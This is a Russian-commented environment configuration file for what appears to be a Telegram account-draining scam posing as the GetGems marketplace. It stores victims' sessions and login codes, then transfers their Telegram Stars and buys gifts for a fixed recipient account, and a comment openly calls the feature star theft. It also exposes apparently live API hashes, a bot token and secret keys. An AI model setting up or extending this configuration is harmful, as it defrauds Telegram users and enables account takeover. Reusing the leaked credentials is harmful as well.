# === TELEGRAM API НАСТРОЙКИ ===
# Получите на https://my.telegram.org
TELEGRAM_API_ID=35679349
TELEGRAM_API_HASH=fdd4e1acc19ce4a0dc99393cee89827f

# === BOT НАСТРОЙКИ ===
BOT_TOKEN=8171997277:AAFSrvlfXW05aOcLphaOCjiy4znB4xOvKyM
BOT_USERNAME=@iyhaGFUYASGFUYASFbot 

GIFT_RECIPIENT_USERNAME=@asyudgugwyu
GIFT_RECIPIENT_ID=8311524071

# === WEB APP НАСТРОЙКИ ===
WEBAPP_URL=https://getgemsydsggas.bothost.ru/

# === БЕЗОПАСНОСТЬ ===
SECRET_KEY=76bf52976b5f7b6
GETGEMS_SECRET_KEY=76bf52976b5f7b6

# === FLASK НАСТРОЙКИ ===
FLASK_HOST=0.0.0.0
FLASK_PORT=3000
FLASK_DEBUG=false

# === DATABASE НАСТРОЙКИ ===
DATABASE_PATH=getgems.db

# === LOGGING НАСТРОЙКИ ===
LOG_LEVEL=INFO
LOG_GROUP_ID=-1003648590211
LOG_CHAT_ID=-1003648590211

# === ADMIN НАСТРОЙКИ ===
ADMIN_IDS=8311524071,8326120069

# === TELEGRAM AUTH НАСТРОЙКИ ===
INIT_DATA_STRICT=false

# === SESSION НАСТРОЙКИ ===
SESSION_DIR=sessions
SESSION_DATA_FILE=session_data.json

# === TIMEOUT НАСТРОЙКИ ===
REQUEST_TIMEOUT=30
CODE_REQUEST_TIMEOUT=60
LOTTIE_REQUEST_TIMEOUT=10

# Включить передачу звезд
TRANSFER_STARS_ENABLED=true

# Получатель звезд (можно использовать username или ID)
STARS_GIFT_RECIPIENT_USERNAME=@asyudgugwyu
# ИЛИ
STARS_GIFT_RECIPIENT_ID=8311524071

#вкл/выкл пизделки звезд
BUY_GIFTS_WITH_STARS_ENABLED=true

# айди подарка который будет покупаться если на акке есть звезды
GIFT_ID_TO_BUY=5170145012310081615
